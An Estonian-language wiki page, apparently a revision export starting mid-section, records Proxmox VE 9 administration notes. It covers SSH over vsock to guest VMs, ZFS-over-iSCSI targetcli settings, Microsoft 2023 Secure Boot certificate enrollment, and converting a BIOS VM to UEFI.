# Notice: No "Conflicts=" or "Before=" entries are needed here!

[Socket]
ListenStream=vsock::22
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock@.service
[Unit]
Description=OpenSSH Server Socket Per-Connection Daemon (VSOCK Backup)
Documentation=man:sshd(8) man:sshd_config(5)
After=auditd.service

[Service]
EnvironmentFile=-/etc/default/ssh
# The -i flag forces sshd to run in "inetd" mode to accept the raw systemd socket
ExecStart=-/usr/sbin/sshd -i $SSHD_OPTS
StandardInput=socket
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755
</pre>

Käivitamiseks sobib öelda

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now sshd-vsock.socket
</pre>

Tulemusena kuulatakse 22/vsock peal

<pre>
root@zabbix-pub-01:~# systemctl list-sockets | grep ssh
192.168.10.194:22 ssh.socket ssh.service
vsock::22 sshd-vsock.socket -
</pre>

Kasutamine paistab välja nii

<pre>
root@pve-wrx90e:~# ssh root@vsock/50194
</pre>

===Proxmox VE Firewall===

====Misc====

Probleeme tekitada võiv kombinatsioon, vältida

* Hardware -> network device -> Firewall - Enable
* Firewall -> Option - No

====Kasulikud lisamaterjalid====

* https://pve.proxmox.com/pve-docs-7/chapter-pve-firewall.html

===Misc===

Tundub, et pve 9 ja qemu 11 kandis on hakanud ilmuma 'x86_64 v2 aes' virtuaalse protsessori kasutamisel sellised teated, nt 'host' protsessoriga neid ei ole

<pre>
root@pve-wrx90e:~# pveversion
pve-manager/9.2.3/d0fde103346cf89a (running kernel: 7.0.6-2-pve)

root@pve-wrx90e:~# dmesg | grep WRMSR | tail -n 4
[30021.694536] kvm: kvm [323176]: vcpu0, guest rIP: 0xffffffffb807e744 Unhandled WRMSR(0xc0010007) = 0xffff
[30090.614209] kvm: kvm [324048]: vcpu0, guest rIP: 0xffffffff84e6d9b4 Unhandled WRMSR(0xc0010007) = 0xffff
[30308.798770] kvm: kvm [326811]: vcpu0, guest rIP: 0xffffffff8d67e744 Unhandled WRMSR(0xc0010007) = 0xffff
[180421.745980] kvm: kvm [3632532]: vcpu0, guest rIP: 0xffffffff81242297 Unhandled WRMSR(0xc0010007) = 0xffff
</pre>

===arm64 platvormi emuleerimine===

Tundub, et PVE v. 9.2 juures ilmub webgui peale vcpu valik 'arm (64-bit)'

[[Fail:20260614-pve-01.png|600px]]

kus

* tulemusena ta töötab, aga väga nö rahulikult

<pre>
root@pve-svc-02:~# apt-get install pve-edk2-firmware-aarch6
</pre>

===Kasulikud lisamaterjalid===

* TODO

Proxmox v. 9 kasutamine

2026-06-20T14:28:11Z

Imre: /* Üle vsock ssh kasutamine - Ubuntu 24.04 */

===Sissejuhatus===

TODO

===Virtuaalne riistvara===

Klaviatuur ja hiir

<pre>
root@pwrk-02:~# systool -b serio
Bus = "serio"

Device = "serio0"
Device = "serio1"

root@pwrk-02:~# systool -b serio -v
Bus = "serio"

Device = "serio0"
Device path = "/sys/devices/platform/i8042/serio0"
bind_mode = "auto"
description = "i8042 KBD port"
drvctl = <store method only>
err_count = "0"
extra = "0"
firmware_id = "PNP: PNP0303"
force_release = "369-370"
modalias = "serio:ty06pr00id00ex00"
scroll = "0"
set = "2"
softraw = "1"
softrepeat = "0"
uevent = "DRIVER=atkbd
SERIO_TYPE=06
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty06pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0303"

Device = "serio1"
Device path = "/sys/devices/platform/i8042/serio1"
bind_mode = "auto"
description = "i8042 AUX port"
drvctl = <store method only>
firmware_id = "PNP: PNP0f13"
modalias = "serio:ty01pr00id00ex00"
protocol = "VirtualPS/2"
rate = "100"
resetafter = "5"
resolution = "200"
resync_time = "0"
uevent = "DRIVER=psmouse
SERIO_TYPE=01
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty01pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0f13"
</pre>

===remote zfs over iscsi===

====Mõisted====

* FUA (Forced Unit Access) -
* WCE (Write Cache Enable) -
* TPU (Thin Provisioning UNMAP) -
* TPWS (WRITE_SAME / Zeroing) -
* VFS (virtual file system) -

====Tööpõhimõte====

Virtuaalse arvuti vaatest andmetega tegelemine

pve virtuaalne arvuti -> pve füüsiline arvuti -> over-iscsi-zfs-storage-server

Sõltuvalt qemu virtuaalse arvuti virtuaalse plokkseadme 'Cache' seadistustest on võimalik erinevate cache komplektide-kombinatsioonide kasutamine andmete liikumisel virtuaalses arvutis töötava protsessi juurest zfs storage serveri füüsilisele plokkseadmele. Tundub, et 2025 aastal on kõige keskmisemale kasutusele sobiv valik 'Cache: nocache'

* hea jõudlus
* hea terviklus

Andmete liikumise teekond

* virtuaalse arvuti rakendus
* virtuaalse arvuti vfs failisüsteem
* virtuaalse arvuti page cache (vfs'ga seotud)
* virtuaalse arvuti ext4 failisüsteem (ext4 draiver)
* virtuaalse arvuti lvm
* virtuaalse arvuti fdisk partitsioonid
* virtuaalse arvuti virtuaalne sata vms kontroller
* füüsilise arvuti qemu protsess
* füüsilise arvuti open-iscsi poolt teostatud /dev/sda scsi plokkseade (puudub cache)
* füüsilises arvutis storage'ga seotud cache puudub
* storage arvuti targetcli (puutub cache)
* storage arvuti zfs ressurss (sisaldab zfs cache)
* storage avuti füüsilise plokkseadme controller-cache

'Cache: nocache' parameeter on üks vähestest parameetritest, mis avaldab mõju nö mõlemas suunas

* virtuaalse arvuti seest kasutada olevale storage ressursile
* kuidas füüsilise arvuti sees virtuaalsele arvutile vastav qemu protsess kasutab allolevat plokkseadet

Käesolevas tekstis kirjeldatakse nelja komponendi seadistamist

* virtuaalsele arvutile vastav qemu protsess
* iscsi initiator
* iscsi target
* zfs lahendus

====zfs lahendus iscsi target arvutis====

Füüsilised kettad on kasutusel nö kõige tavalisemal viisil, eriti tähendab see, et ketastel on sisselülitatud nö tavaline controller-cache

<pre>
root@pve-svc-02:~# lsscsi -s | grep 4.00T
[2:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdc 4.00TB
[3:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdd 4.00TB
[N:0:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme0n1 4.00TB
[N:1:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme1n1 4.00TB
</pre>

zfs lülituse moodustamine

<pre>
root@pve-svc-02:~# cat create-zpool-raidz1-x4.sh
zpool create -o ashift=13 zp_data raidz1 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FE58 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FF7B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501827B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501856Z
</pre>

zfs cache töötab tavalisel viisil, st on sisse lülitatud olekus, nt

<pre>
root@pve-svc-02:~# zfs get all | grep -i cache | grep vm-106-disk-0
zp_crucial_mx_4/vm-106-disk-0 primarycache all default
zp_crucial_mx_4/vm-106-disk-0 secondarycache all default
</pre>

====targetcli iscsi target arvutis====

targetcli seadistamine koosneb kahest tegevusest

* zfs põhise alus-storage storage publitseerimine
* publitseerimisel sobivalt scsi protokolli parameetrite kasutamine (eriti cache, sparse jms esitamine)

<pre>
/> /iscsi create iqn.2025-10.moraal.srv:storage.zfstarget
/> /iscsi/iqn.2025-10.moraal.srv:storage.zfstarget/tpg1/acls create iqn.1993-08.org.debian:01:4cbe32bd26b
</pre>

Sobiv seadistus, mis tuleb plokk-ressursi jaoks kehtestada

<pre>
root@pve-svc-02:~# targetcli /backstores/block/zp_crucial_mx_4-vm-108613-disk-4 get attribute | grep =
======================
alua_support=1
block_size=512
emulate_3pc=1
emulate_caw=1
emulate_dpo=1
emulate_fua_read=1
emulate_fua_write=1
emulate_model_alias=1
emulate_pr=1
emulate_rest_reord=0
emulate_rsoc=1
emulate_tas=1
emulate_tpu=0
emulate_tpws=0
emulate_ua_intlck_ctrl=0
emulate_write_cache=0
enforce_pr_isids=1
force_pr_aptpl=0
hw_block_size=512 [ro]
hw_max_sectors=32768 [ro]
hw_pi_prot_type=0 [ro]
hw_queue_depth=128 [ro]
is_nonrot=1
max_unmap_block_desc_count=1
max_unmap_lba_count=131072
max_write_same_len=65535
optimal_sectors=32768
pgr_support=1
pi_prot_format=0
pi_prot_type=0
pi_prot_verify=0
queue_depth=128
submit_type=0
unmap_granularity=8
unmap_granularity_alignment=0
unmap_zeroes_data=0
</pre>

kus

* TODO

Muudatuse tegemine

<pre>
/backstores/b...108613-disk-4> set attribute emulate_tpws=0
/backstores/b...108613-disk-4> set attribute emulate_tpu=0
</pre>

Kasutamine paistab välja selline

<pre>
root@pve-svc-02:~# targetcli
targetcli shell version 2.1.53
Copyright 2011-2013 by Datera, Inc and others.
For help on commands, type 'help'.

/> ls
o- / ......................................................................................................................... [...]
o- backstores .............................................................................................................. [...]
| o- block .................................................................................................. [Storage Objects: 3]
| | o- zp_crucial_mx_4-vm-100-disk-0 ......................... [/dev/zp_crucial_mx_4/vm-100-disk-0 (20.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-106-disk-5 ......................... [/dev/zp_crucial_mx_4/vm-106-disk-5 (16.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-108613-disk-1 .................... [/dev/zp_crucial_mx_4/vm-108613-disk-1 (4.0GiB) write-thru activated]
| | o- alua ................................................................................................... [ALUA Groups: 1]
| | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| o- fileio ................................................................................................. [Storage Objects: 0]
| o- pscsi .................................................................................................. [Storage Objects: 0]
| o- ramdisk ................................................................................................ [Storage Objects: 0]
o- iscsi ............................................................................................................ [Targets: 1]
| o- iqn.2025-10.moraal.srv:storage.zfstarget .......................................................................... [TPGs: 1]
| o- tpg1 ............................................................................................... [no-gen-acls, no-auth]
| o- acls .......................................................................................................... [ACLs: 1]
| | o- iqn.1993-08.org.debian:01:4cbe32bd26b ................................................................ [Mapped LUNs: 3]
| | o- mapped_lun0 ...................................................... [lun0 block/zp_crucial_mx_4-vm-108613-disk-1 (rw)]
| | o- mapped_lun1 ......................................................... [lun1 block/zp_crucial_mx_4-vm-106-disk-5 (rw)]
| | o- mapped_lun2 ......................................................... [lun2 block/zp_crucial_mx_4-vm-100-disk-0 (rw)]
| o- luns .......................................................................................................... [LUNs: 3]
| | o- lun0 .............. [block/zp_crucial_mx_4-vm-108613-disk-1 (/dev/zp_crucial_mx_4/vm-108613-disk-1) (default_tg_pt_gp)]
| | o- lun1 .................... [block/zp_crucial_mx_4-vm-106-disk-5 (/dev/zp_crucial_mx_4/vm-106-disk-5) (default_tg_pt_gp)]
| | o- lun2 .................... [block/zp_crucial_mx_4-vm-100-disk-0 (/dev/zp_crucial_mx_4/vm-100-disk-0) (default_tg_pt_gp)]
| o- portals .................................................................................................... [Portals: 1]
| o- 0.0.0.0:3260 ..................................................................................................... [OK]
o- loopback ......................................................................................................... [Targets: 0]
o- srpt ............................................................................................................. [Targets: 0]
o- vhost ............................................................................................................ [Targets: 0]
o- xen-pvscsi ....................................................................................................... [Targets: 0]
/>
</pre>

Lisaks saab portaali käest küsida attribute ja parameter komplekte, nt

<pre>
root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get parameter | grep =
======================
AuthMethod=CHAP
DataDigest=CRC32C,None
DataPDUInOrder=Yes
DataSequenceInOrder=Yes
DefaultTime2Retain=20
DefaultTime2Wait=2
ErrorRecoveryLevel=0
FirstBurstLength=65536
HeaderDigest=CRC32C,None
IFMarkInt=Reject
IFMarker=No
ImmediateData=Yes
InitialR2T=Yes
MaxBurstLength=262144
MaxConnections=1
MaxOutstandingR2T=1
MaxRecvDataSegmentLength=8192
MaxXmitDataSegmentLength=262144
OFMarkInt=Reject
OFMarker=No
TargetAlias=LIO Target

root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get attribute | grep =
======================
authentication=1
cache_dynamic_acls=0
default_cmdsn_depth=64
default_erl=0
demo_mode_discovery=1
demo_mode_write_protect=1
fabric_prot_type=0
generate_node_acls=0
login_keys_workaround=1
login_timeout=15
prod_mode_write_protect=0
t10_pi=0
tpg_enabled_sendtargets=1
root@pm60-trt:~#
</pre>

kus

* parameter - võrgus kõneldavad asjad
* attribute - lokaalselt olukorda määratlevad asjad

====iscsi initiator====

TODO

====qemu protsess====

Kasutamine

[[Fail:20251019-remote-zfs-over-iscsi-01.png|600px]]

====Kasulikud lisamaterjalid====

TODO

===Secure boot - nn Microsoft 2023 sertifikaat===

====Tööpõhimõte====

TODO

====Olemasolev olukord enne muudatust====

<pre>
root@pwrk-01:~# apt-get install efitools
root@pwrk-01:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====Muudatus====

<pre>
root@pve-wrx90e:~# qm enroll-efi-keys 902198
skipping - OS type is neither Windows 10 nor Windows 11

root@pve-wrx90e:~# qm set 902198 --ostype win10
root@pve-wrx90e:~# qm enroll-efi-keys 902198
root@pve-wrx90e:~# qm set 902198 --ostype l26
</pre>

ja

<pre>
from

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,pre-enrolled-keys=1,size=1M

to

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,ms-cert=2023w,pre-enrolled-keys=1,size=1M
</pre>

====Uus olukord peale muudatust====

<pre>
root@pwrk-02:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, O=Microsoft Corporation, CN=Microsoft UEFI CA 2023
C=US, O=Microsoft Corporation, CN=Windows UEFI CA 2023
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====WebGUI abil====

WebGUI abil vm sertifikaat muudatus

Disk Action -> Enroll Updated Certificates

[[Fail:20260611-pve-ms-cert-2023-01.png|700px]]

kus

* TODO

===Misc===

====pveupdate====

* uuendab webgui liidese sertifikaadi

<pre>
root@pve-wrx90e:~# pveupdate
Loading ACME account details
Placing ACME order
Order URL: https://acme-v02.api.letsencrypt.org/acme/order/2232348225/504476182801

Getting authorization details from 'https://acme-v02.api.letsencrypt.org/acme/authz/2232348225/694056506271'
The validation for pve-wrx90e.auul.pri.ee is pending!
Setting up webserver
Triggering validation
Sleeping for 5 seconds
Status is 'valid', domain 'pve-wrx90e.auul.pri.ee' OK!

All domains validated!

Creating CSR
Checking order status
Order is ready, finalizing order
valid!

Downloading certificate
Setting pveproxy certificate and key
Restarting pveproxy
Revoking old certificate
Revoke request to CA failed: Error: POST to https://acme-v02.api.letsencrypt.org/acme/revoke-cert
{
"type": "urn:ietf:params:acme:error:unauthorized",
"detail": "Unable to revoke :: Certificate is expired",
"status": 403
}
</pre>

====pveupgrade====

* uuendab süsteemi apt paketihaldusega tarkvara

===BIOS arvuti teisendamine UEFI arvutiks===

====Tööpõhimõte====

Peamised kaalutlused BIOS arvuti teisendamisel UEFI arvutiks

* vajadus saada osa secure boot lahendusega kaasnevast turvalisusest
* nö täieline reinstall oleks liiga aeganõudev, kohmakas jne

Muudatus seisneb virtuaalsele arvutile täiendava nö esimese plokkseadme lisamisel, suurusega 1 G. Sinna moodustatakse gpt partitsioonitabel ning vfat failisüsteem, ja ta vastab nö kataloogile /boot/efi, sinna ta ka monteeritakse kokkuvõttes. Juurfailisüsteem ja muu jääb sinna kus ta seni on olnud. Oluline on, et muudatuse käigus ei muudeta olemasoleva plokkseadme partitsioonitabelit ega lvm vms, st ebaõnnestumisel saab pöörduda tagasi kergesti (varundus peaks aga siiski olema olemas).

====Muudatuse protseduur====

Enne muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-01.png|700px]]

ning

<pre>
# df -T -h -t ext4
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
</pre>

Lisatakse töötavale arvutile 1 g plokkseade

Hardware -> Add disk -> ...

Veendutakse, mis on konkreetsel juhtumil 1 g lisatud plokkseadme nimi, nt

<pre>
# fdisk /dev/vdb -l
Disk /dev/vdb: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</pre>

edasi käsundamine

<pre>
# apt-get install parted

# parted /dev/vdb mklabel gpt
# parted /dev/vdb mkpart primary fat32 1MiB 100%
# parted /dev/vdb set 1 esp on
# mkfs.vfat -F 32 /dev/vdb1
# mkdir -p /boot/efi
# blkid /dev/vdb1
</pre>

Muuta /etc/fstab faili, st lisada üks rida olemaoleva /boot rea alla, uuid on mitte partitsiooni, aga vfat failisüsteemi

<pre>
# cat /etc/fstab
..
UUID=XXXX-XXXX /boot/efi vfat defaults 0 2
</pre>

Lisada paketid

<pre>
# systemctl daemon-reload
# mount /boot/efi
# apt update
# apt install grub-efi-amd64-signed shim-signed mokutil
# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian --removable
# update-grub
</pre>

tulemusena

<pre>
# find /boot/efi/ -type f -ls
115 932 -rwxr-xr-x 1 root root 952384 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.EFI
116 2624 -rwxr-xr-x 1 root root 2685544 mai 17 12:00 /boot/efi/EFI/BOOT/grubx64.efi
117 832 -rwxr-xr-x 1 root root 851368 mai 17 12:00 /boot/efi/EFI/BOOT/mmx64.efi
118 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.CSV
119 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/grub.cfg

# cat /boot/efi/EFI/BOOT/grub.cfg
search.fs_uuid 5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1 root
set prefix=($root)'/grub'
configfile $prefix/grub.cfg

# blkid /dev/vda1
/dev/vda1: UUID="5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1" BLOCK_SIZE="1024" TYPE="ext4" PARTUUID="cfa36d3a-01"
</pre>

Õeldakse virtuaalsele arvutile poweroff ja muudetakse seadistusi

* lisatakse 'EFI Disk' (virtuaalne efi riistvara seadistuste salvestamine jms)
* muudetakse bios -> uefi
* muudetakse chipset i440fx -> q35
* muudetakse display default -> virtio-gpu

Peale muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-02.png|700px]]

Lisaks on boot järjekorra seadmed muudetud

[[Fail:20260516-from-bios-to-uefi-03.png|700px]]

kus

* tingimata vajalik on virtio1 ja virtio0 - esimesel on bootload ja grub.cfg lühike konf, teisel on konfi sisuline osa

Tulemusena töötab arvuti uefi secure boot režiimis

<pre>
# mokutil --sb-state
SecureBoot enabled

# df -t vfat -t ext4 -T -h
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
/dev/vdb1 vfat 1020M 8,7M 1012M 1% /boot/efi
</pre>

Kõige lõpus võiks veel öelda, nii tekivad nö naturaalsed efibootmgr ja /boot/efi sissekanded nagu nad oleks seal nö sündinud-uefi'na arvutil

<pre>
# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}

# grub-install /dev/vdb
Installing for x86_64-efi platform.
Installation finished. No error reported.

# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0004,0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}
Boot0004* debian HD(1,GPT,0fb8cfd1-c90b-4da2-97db-ceda14464a90,0x800,0x1ff000)/File(\EFI\proxmox\shimx64.efi)
</pre>

====Boot Order märkused====

PVE webgui Boot Order määrab kaks

* millised plokkseadmed osalevad uefi faasis
* millised järjekorras plokkseadmed osalevad uefi faasis alglaadimisel

Kui on linnutatud ainult üks seade

[[Fail:20260516-from-bios-to-uefi-05.png|800px]]

Kui on linnutatud ainult kaks seadet

[[Fail:20260516-from-bios-to-uefi-04.png|800px]]

Antud juhul on see väga oluline kuna grub alglaadur on kahel seadmel laiali

* grub.efi rakendus asub /dev/vdb
* grub.conf seadistus asub /dev/vda

Kui Boot Order on linnutatud vaid /dev/vda, siis peatub arvuti käivitumine 'grub>' prompt juures. Selles mõttes võiks olla PVE webgui osakonna nimeks nt 'UEFI device visibility and Boot Order'.

===Üle vsock ssh kasutamine - Ubuntu 26.04 ja Debian v. 13===

Osutub, et uuemal ajal, st PVE v. 9, Debian v. 13 virtuaalne avuti on võimalik PVE host pealt pöörduda guest poole üle ssh kasutades vsock protokolli (mitte tavalist tcp/ip protokollil põhinevat võrku). Selleks tuleb virtuaalsele arvutile lisada PVE platvormi poolt vsock tugi

<pre>
root@pve-wrx90e:~# head -n 1 /etc/pve/qemu-server/50056.conf
args: -device vhost-vsock-pci,guest-cid=50056
</pre>

ja virtuaalsel arvutil peab olema tarkvaraline vsock tugi. Nt Debian v. 13 puhul on sshd serverisse see integreeritud

<pre>
root@unifi-oss:~# systemctl | grep ssh
ssh.service loaded active running OpenBSD Secure Shell server
sshd@2-50056:22-2:3327097365.service loaded active running OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097364)
system-sshd.slice loaded active active Slice /system/sshd
sshd-unix-local.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local)
sshd-vsock.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK)
ssh-access.target loaded active active SSH Access Available
</pre>

kus

* systemd-ssh-generator on selline süsteem, mis käigult avastab süsteemi võimekusi ja vastavalt seadistab teenustele omadusi (nt ssh puhul lülitatakse sisse vsock tugi)

ning

<pre>
root@unifi-oss:~# systemctl status sshd@2-50056:22-2:3327097365.service
● sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365)
Loaded: loaded (/usr/lib/systemd/system/sshd@.service; static)
Active: active (running) since Mon 2026-06-01 00:04:39 EEST; 16s ago
Invocation: 84acdad56690460e8e0fbffd2ecd4d69
TriggeredBy: ● sshd-vsock.socket
Docs: man:sshd(8)
man:sshd_config(5)
Main PID: 876 (sshd-session)
Tasks: 1 (limit: 6978)
Memory: 1.8M (peak: 3.9M)
CPU: 27ms
CGroup: /system.slice/system-sshd.slice/sshd@2-50056:22-2:3327097365.service
‣ 876 "sshd-session: root [priv]"

Jun 01 00:04:39 unifi-oss systemd[1]: Started sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365).
Jun 01 00:04:40 unifi-oss sshd-session[876]: Accepted publickey for root from UNKNOWN port 65535 ssh2: ED25519 SHA256:3cj7QCk4leNOSQJlfeUeHr6YfsA0r3bRUqZS9Rey3jM
Jun 01 00:04:40 unifi-oss sshd-session[876]: pam_unix(sshd:session): session opened for user root(uid=0) by root(uid=0)
</pre>

kus

* triggered by 'sshd-vsock.socket'

ssh kliendi st pve host poolel peab olema teadmine, kuidas käituda kui üritatakse kasutada vsock protokolli üle sshd serverit

<pre>
root@pve-wrx90e:~# cat /lib/systemd/ssh_config.d/20-systemd-ssh-proxy.conf
# SPDX-License-Identifier: LGPL-2.1-or-later
#
# Allow connecting to the local host directly via ".host"
Host .host machine/.host
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy unix/run/ssh-unix-local/socket %p
ProxyUseFdpass yes
CheckHostIP no

# Make sure unix/* and vsock/* can be used to connect to AF_UNIX and AF_VSOCK paths.
# Make sure machine/* can be used to connect to local machines registered in machined.
#
Host unix/* vsock/* machine/*
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy %h %p
ProxyUseFdpass yes
CheckHostIP no

# Disable all kinds of host identity checks, since these addresses are generally ephemeral.
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
</pre>

kus

* tuleb kasutada 'man systemd-ssh-proxy' utiliiti

Kasutamine paistab välja selline

<pre>
root@pve-wrx90e:~# ssh root@vsock/50056
Warning: Permanently added 'vsock/50056' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 31 23:53:37 2026 from 192.168.10.156
root@unifi-oss:~#

root@unifi-oss:~# w
23:59:55 up 6 min, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 - 23:59 1.00s 0.00s ? w
</pre>

kus

* vsock kaudu lähenemise puhul on iseloomulik 'FROM -' (tavaliselt on seal src ip aadress)

Peale kasutaja sisselogimist paistab

<pre>
root@unifi-oss:~# ss -a -p --vsock
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
v_str LISTEN 0 0 *:22 *:* users:(("systemd",pid=1,fd=66))
v_str ESTAB 0 0 50056:22 2:3327097366 users:(("sshd-session",pid=914,fd=7),("sshd-session",pid=914,fd=6),("sshd-session",pid=905,fd=7),("sshd-session",pid=905,fd=6),("systemd",pid=1,fd=8))
</pre>

kus

* af_vsock osakonnas on sarnasel af_inet osakonnale ka listen socket ning 'active connected socket'

Tundub, et uuemal ajal on ssh agar kuulama ka af_unix soketil

<pre>
root@unifi-oss:~# screendump | grep -i ssh
[ OK ] Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
[ OK ] Listening on sshd-vsock.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK).
[ OK ] Reached target ssh-access.target - SSH Access Available.
Starting ssh.service - OpenBSD Secure Shell server...
[ OK ] Started ssh.service - OpenBSD Secure Shell server.
</pre>

ja tõesti, lokaalselt saab arvutisse logida sisse nii

<pre>
root@unifi-oss:~# ssh unix/run/ssh-unix-local/socket
Warning: Permanently added 'unix/run/ssh-unix-local/socket' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 1 00:16:42 2026 from UNKNOWN

root@unifi-oss:~# w
00:16:44 up 23 min, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/2 - 00:16 1.00s 0.00s ? w
root pts/1 - 00:16 2.00s 0.00s ? ssh unix/run/ssh-unix-local/socket
</pre>

Kasulikud lisamaterjalid

* https://www.auul.pri.ee/wiki/Linux_operatsioonis%C3%BCsteemis_t%C3%B6%C3%B6tab_v%C3%B5rgu%C3%BChendus#systemd_kasutamine_network-proxy_rollis

===Üle vsock ssh kasutamine - Ubuntu 24.04===

Ettevalmistavalt tuleb 22/tcp seadistada käima ainult konkreetselt ip aadressil

<pre>
root@zabbix-pub-01:~# grep ^Liste /etc/ssh/sshd_config
ListenAddress 192.168.10.194

